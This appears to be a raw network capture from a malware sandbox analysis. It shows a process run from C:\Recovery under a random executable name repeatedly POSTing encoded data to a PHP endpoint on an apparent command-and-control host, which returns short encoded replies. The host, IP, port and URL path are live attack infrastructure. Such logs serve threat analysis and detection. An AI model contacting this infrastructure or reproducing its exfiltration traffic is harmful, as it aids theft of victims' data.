                                                                    Nov 6, 2024 03:38:43.839093924 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    93192.168.2.45004637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:43.970978975 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:44.356703043 CET1012OUTData Raw: 56 51 5a 5c 56 5e 50 5a 5a 5f 52 51 54 5e 5b 5a 55 55 59 5b 51 51 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQZ\V^PZZ_RQT^[ZUUY[QQR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%8,=<^+(()-_==*\'('#/V+>$-C/7&)'X$.Q-6
                                                                    Nov 6, 2024 03:38:44.901628017 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:44.901806116 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:38:44.901815891 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    94192.168.2.45005237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:45.035986900 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    95192.168.2.45005637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:45.382077932 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:45.736754894 CET1276OUTData Raw: 56 50 5f 59 53 5c 50 59 5a 5f 52 51 54 58 5b 5e 55 55 59 56 51 51 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VP_YS\PYZ_RQTX[^UUYVQQR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,2U<(<04[>.=38$Z4)?+]:0\4%%'X$.Q-.
                                                                    Nov 6, 2024 03:38:46.184535980 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:46.259742022 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 14 3c 14 39 02 24 2b 28 16 29 58 39 12 28 09 2f 19 2f 1c 37 01 2a 1d 2b 03 29 16 28 54 23 11 05 58 23 22 35 10 37 1c 23 12 3c 2b 21 5f 05 1d 3a 07 27 17 3c 50 3e 21 2d 01 2a 51 2c 41 32 20 37 1b 3e 05 2e 1e 20 03 21 0d 31 07 3e 00 26 54 3f 54 3f 1a 39 5f 2e 2c 20 08 32 00 2a 57 09 16 20 1c 24 0d 38 06 3e 1f 27 5b 24 3d 35 59 32 14 0e 0b 29 02 28 00 20 37 26 59 29 55 23 5b 22 09 07 04 26 2a 3e 42 24 2e 2c 0e 29 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: <9$+()X9(//7*+)(T#X#"57#<+!_:'<P>!-*Q,A2 7>. !1>&T?T?9_., 2*W $8>'[$=5Y2)( 7&Y)U#["&*>B$.,)"&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    96192.168.2.45005737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:45.524365902 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:45.876008987 CET1012OUTData Raw: 53 56 5f 59 53 5a 50 5a 5a 5f 52 51 54 5c 5b 53 55 5d 59 5b 51 51 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SV_YSZPZZ_RQT\[SU]Y[QQRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%,1<4](0$])*>>.6_0<^42(-3Y.X7&Y&)'X$.Q->
                                                                    Nov 6, 2024 03:38:46.343054056 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:46.413202047 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    97192.168.2.45006337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:46.540278912 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:46.891597986 CET1012OUTData Raw: 53 53 5a 5e 56 59 50 5c 5a 5f 52 51 54 53 5b 5c 55 53 59 5d 51 55 52 5f 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SSZ^VYP\Z_RQTS[\USY]QUR_QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&-/T<?<3 =!_>*Z%(4^#?1(:C/#1'X$.Q-
                                                                    Nov 6, 2024 03:38:47.349859953 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:47.430001974 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    98192.168.2.45006937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:47.676194906 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:48.032183886 CET1012OUTData Raw: 56 5f 5f 58 56 5f 50 5c 5a 5f 52 51 54 5d 5b 5b 55 53 59 5e 51 50 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: V__XV_P\Z_RQT][[USY^QPRYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y-/&V($\?#8)**.\''#<:W+.<.;4'Y2'X$.Q-
                                                                    Nov 6, 2024 03:38:48.496067047 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:48.568576097 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    99192.168.2.45007637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:48.688729048 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:49.047785044 CET1012OUTData Raw: 53 53 5f 5f 56 5e 55 5e 5a 5f 52 51 54 5d 5b 52 55 53 59 59 51 52 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SS__V^U^Z_RQT][RUSYYQRRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%;?7( =1Z*-38#V<4.5+7.^')'X$.Q-
                                                                    Nov 6, 2024 03:38:49.488985062 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:49.568878889 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    100192.168.2.45008237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:50.337078094 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:50.688301086 CET1012OUTData Raw: 56 57 5f 59 56 5b 50 58 5a 5f 52 51 54 5b 5b 5f 55 56 59 57 51 53 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VW_YV[PXZ_RQT[[_UVYWQSRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&-?((<U(>!*-53 7,"P)>(-% 7')'X$.Q-"
                                                                    Nov 6, 2024 03:38:51.148439884 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:51.222868919 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    101192.168.2.45008937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:51.272571087 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    102192.168.2.45009437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:51.362425089 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:51.719592094 CET1012OUTData Raw: 56 53 5f 5f 53 5d 55 58 5a 5f 52 51 54 52 5b 53 55 55 59 56 51 57 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VS__S]UXZ_RQTR[SUUYVQWRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%\8/%?8(X? $=*6=0(,_ /9?#-5$X '1'X$.Q-
                                                                    Nov 6, 2024 03:38:52.165292025 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:52.236735106 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    103192.168.2.45010037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:52.364758968 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:52.719836950 CET1012OUTData Raw: 56 56 5a 5d 56 5f 50 5d 5a 5f 52 51 54 5f 5b 58 55 50 59 58 51 55 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VVZ]V_P]Z_RQT_[XUPYXQUR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&/1?$X(<X>:X>.50($Y#?.+-#.68 ''9'X$.Q-2
                                                                    Nov 6, 2024 03:38:53.185082912 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:53.264235973 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:51 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    104192.168.2.45010437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:53.401988029 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:53.760251999 CET1012OUTData Raw: 56 51 5a 5b 56 5f 55 5d 5a 5f 52 51 54 53 5b 53 55 55 59 59 51 56 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQZ[V_U]Z_RQTS[SUUYYQVR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&-,"<8? 4(*"*-3^(41)-0-? *2'X$.Q-
                                                                    Nov 6, 2024 03:38:54.212373972 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:54.288197041 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:52 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    105192.168.2.45011237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:54.558754921 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:54.907113075 CET1012OUTData Raw: 56 57 5f 5c 56 56 55 58 5a 5f 52 51 54 5e 5b 5c 55 56 59 5b 51 54 52 5b 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VW_\VVUXZ_RQT^[\UVY[QTR[QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&//*?8(?)-^)=3'"?>('\9&3 7&'X$.Q-6
                                                                    Nov 6, 2024 03:38:55.361315966 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:55.440946102 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:53 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    106192.168.2.45011437.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:55.702903986 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:56.047849894 CET1012OUTData Raw: 56 54 5f 5b 56 57 50 58 5a 5f 52 51 54 5f 5b 59 55 54 59 5a 51 56 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VT_[VWPXZ_RQT_[YUTYZQVRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%],?6R=+(]>3<\*\1X*.6]%('#!+-3-6;4$.&'X$.Q-2


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    107192.168.2.45011537.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:56.448141098 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:56.797730923 CET1276OUTData Raw: 56 53 5a 5a 53 5d 50 5b 5a 5f 52 51 54 5d 5b 59 55 57 59 5f 51 54 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VSZZS]P[Z_RQT][YUWY_QTRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/=<;<(Y()->>[0;?4>Q?0:/!729'X$.Q-
                                                                    Nov 6, 2024 03:38:57.290230036 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:57.362183094 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
